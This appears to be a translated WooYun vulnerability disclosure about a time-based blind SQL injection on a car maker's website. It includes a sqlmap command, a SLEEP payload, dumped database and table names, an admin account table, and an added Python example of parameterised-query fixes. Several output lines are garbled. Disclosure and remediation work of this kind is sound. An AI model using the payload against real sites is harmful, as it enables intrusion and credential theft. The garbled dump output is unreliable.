Vulnerability summary
Vulnerability details
Disclosure status:
2015-12-29: Details reported to the vendor; awaiting vendor handling
2016-01-05: Vendor has confirmed; details disclosed only to the vendor
2016-01-15: Details disclosed to core white hats and relevant domain experts
2016-01-25: Details disclosed to regular white hats
2016-02-04: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public
Brief description:
江淮汽车 (JAC Motors), China's "divine car"
Detailed description:
1. Injection point:
sqlmap -u "http://**.**.**.**/jmclove/index.php/news/detail/id/438*" --batch
2. Injection details:
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://**.**.**.**:80/jmclove/index.php/news/detail/id/438) AND (SELECT * FROM (SELECT(SLEEP(5)))GzGl) AND (1231=1231
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
available databases [10]:
[*] information_schema
[*] jiangling
[*] jiangling3
[*] leibotech
[*] leibotech3
[*] mysql
[*] repldb
[*] test
[*] transitsales
[*] yuhu
3. Table information:
Database: jiangling
[83 tables]
+--------------------------+
| Admin                    |
| Book                     |
| Book_copy                |
| Book_copy1               |
| Category                 |
| Dealer_co                |
| IP                       |
| Owners                   |
| Service                  |
| ServiceMain              |
| SurveryView              |
| SurveyUsers              |
| TestDrive                |
| Usess                    |
| a_yuhu_count)            |
| b_yusheng-20150907和之前的整合圩一起没事可以删除       |
| b_yusheng_ke\\?81        |
| nusheng_contribute\x11   |
| a_ditangxing1_baoming    |
| a_ditangxing1_photo      |
| a_ditangxing1_stat       |
| a_ditangxing_baoming     |
| a_ditangxing_photo       |
| a_ditangxing_stat        |
| a_duanwu_survey          |
| a_duenwu_contribute      |
| a_jmc2015_360che         |
| a_kairui                 |
| a_kairui_count           |
| a_kuirui_ip              |
| a_quanshun               |
| a_quanshun_20150204      |
| a_quanshun_20150323      |
| a_quanshun_key           |
| a_sitekvs                |
| a_stat                   |
| a_yuhu                   |
| a_yuhu_ip                |
| a_yuhu_join              |
| admin_info               |
| aealer                   |
| b_quanshun               |
| b_quanshun_dealer        |
| b_quanshun_dealer1       |
| b_quanshun_key           |
| b_transitat              |
| b_yusheng                |
| b_yusheng_dealer         |
| b_yusheng_main           |
| city                     |
| dealermain               |
| ford_aboutweb            |
| ford_activity            |
| ford_cmscp_manager       |
| ford_cmscp_role          |
| ford_cmscp_settinq       |
| ford_log                 |
| ford_saletips            |
| ford_sraining            |
| ford_usehelp             |
| ford_user                |
| ford_user_import_history |
| ford_user_score_change   |
| jl_yh                    |
| news                     |
| newsmain                 |
| nusheng_survey           |
| province                 |
| qs_code                  |
| survey                   |
| survey_list              |
| user_info                |
| vote_info                |
| works_info               |
| xq_ad                    |
| xq_donation              |
| xq_frieod                |
| xq_love                  |
| xq_loveyear              |
| xq_news                  |
| xq_newscate              |
| xq_options               |
| xq_pages                 |
+--------------------------+
4. Table: Admin
[10 entries]
+----+------------+------------+-----------------+------------+---------------------+---------------------+------------+------------+
| id | roles      | username   | direction       | updated_by | created_at          | updated_at          | created_by | p}ssword   |
+----+------------+------------+-----------------+------------+---------------------+---------------------+------------+------------+
| 1  | admin      | jiangling  | news/index      | 1          | 2013-04-04 20:30:02 | 2013-09-02 20:30:06 | 1          | q          |
| 2  | data       | yusheng    | book/ysexport   | 1          | 2013-09-02 18:07:59 | 2013-09-02 18:08:03 | 1          | <blank>    |
| 3  | survey     | survey     | surve{/index    | 1          | 2013-09-17 08:13:44 | 2013-09-17 08:13:46 | 1          | <blank>    |
| 4  | duanwu     | duanwu     | duanwu/admin    | 1          | 0000-00-00 00:00:90 | 0000-00-00 00:00:00 | 1          | <blank>    |
| 5  | ditangxing | ditangxing | ditayxing/admin | 1\x05      | 0000-00-00 @0:00:00 | 0000-00-00 00:00:00 | 1          | <blank>    |
| 6  | testdrive  | testdrive  | testdrive/admin | 1          | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 1          | <blank>    |
| 8  | dtx2015    | dtx2015    | dtx2015/admin   | 1          | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 1          | <blank>    |
| 10 | jmdsj      | jmcsj      | jmcsj/zxsj      | 1          | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 1          | <blank>    |
| 11 | xyss350    | xyss350    | yusheng/admin   | 1          | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 1          | <blank>    |
| 12 | qsyysj     | qsyysj     | jmcsj/admin     | 1          | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 0          | <blank>    |
+----+------------+------------+-----------------+------------+---------------------+---------------------+------------+------------+
5. DBA
[05:58:46] [INFO] fetching current user
[05:58:46] [INFO] resumed: root@localQ?ost
current user is DBA:    True
 
Proof of vulnerability:
Fix
Fix recommendation:
Fix
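The fix section above gives no detail. What follows is an added illustration, not the site's code, of how the `id` route parameter can be handled so that the time-based blind injection class reported here has no SQL text to land in: the path segment is parsed against a strict decimal whitelist and the resulting integer is passed as a bound parameter. It uses an in-memory sqlite3 table with constructed sample rows as a stand-in for the site's MySQL database (the `news` table and its `id`/`title` columns are assumptions); the route pattern mirrors the `index.php/news/detail/id/438` URL shape shown on the page.

```python
import re
import sqlite3

# Constructed sample rows standing in for the site's "news" table
# (assumption: an integer primary key plus a title column).
SAMPLE_NEWS = [(437, "Dealer event"), (438, "Model launch"), (439, "Service notice")]

# Only a short run of decimal digits is an acceptable id. Anything else,
# including a trailing ") AND (SELECT ..." style suffix, is rejected here
# before any database call is made.
ID_RE = re.compile(r"[0-9]{1,9}")

# Path-style parameter routing as on the page: /news/detail/id/<value>
ROUTE_RE = re.compile(r"^/news/detail/id/([^/]*)$")


def open_sample_db():
    """Create the in-memory stand-in database and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT NOT NULL)")
    conn.executemany("INSERT INTO news (id, title) VALUES (?, ?)", SAMPLE_NEWS)
    conn.commit()
    return conn


def parse_news_id(raw):
    """Whitelist parse: the raw segment must be entirely digits."""
    if not ID_RE.fullmatch(raw):
        raise ValueError("invalid news id")
    return int(raw)


def news_id_from_path(path):
    """Extract and validate the id segment from a /news/detail/id/<value> path."""
    m = ROUTE_RE.match(path)
    if m is None:
        raise ValueError("unknown route")
    return parse_news_id(m.group(1))


def fetch_news(conn, news_id):
    """Parameterised lookup: the id is bound, never spliced into the SQL text."""
    return conn.execute(
        "SELECT id, title FROM news WHERE id = ?", (news_id,)
    ).fetchone()


def handle_request(conn, path):
    """Return (status, row). 400 for anything that fails validation, 404 for
    a well-formed id with no matching row, 200 with the row otherwise."""
    try:
        news_id = news_id_from_path(path)
    except ValueError:
        return 400, None
    row = fetch_news(conn, news_id)
    if row is None:
        return 404, None
    return 200, row


if __name__ == "__main__":
    db = open_sample_db()
    print(handle_request(db, "/news/detail/id/438"))
    print(handle_request(db, "/news/detail/id/438) AND (1231=1231"))
```

The payload-shaped request never reaches `fetch_news`: it fails the digit whitelist and is answered with a 400, so there is no query whose timing an attacker could measure. The same two-layer rule (validate the type at the boundary, bind the value in the query) applies unchanged to the real MySQL driver.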
Copyright notice: when reposting, please credit the source: 逆流冰河@乌云 (WooYun)
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 8
Confirmed at: 2016-01-05 17:05
Vendor reply:
CNVD has not directly reproduced the described situation and has not yet established a direct handling channel with the website's administering organization; pending claim.
Latest status:
None yet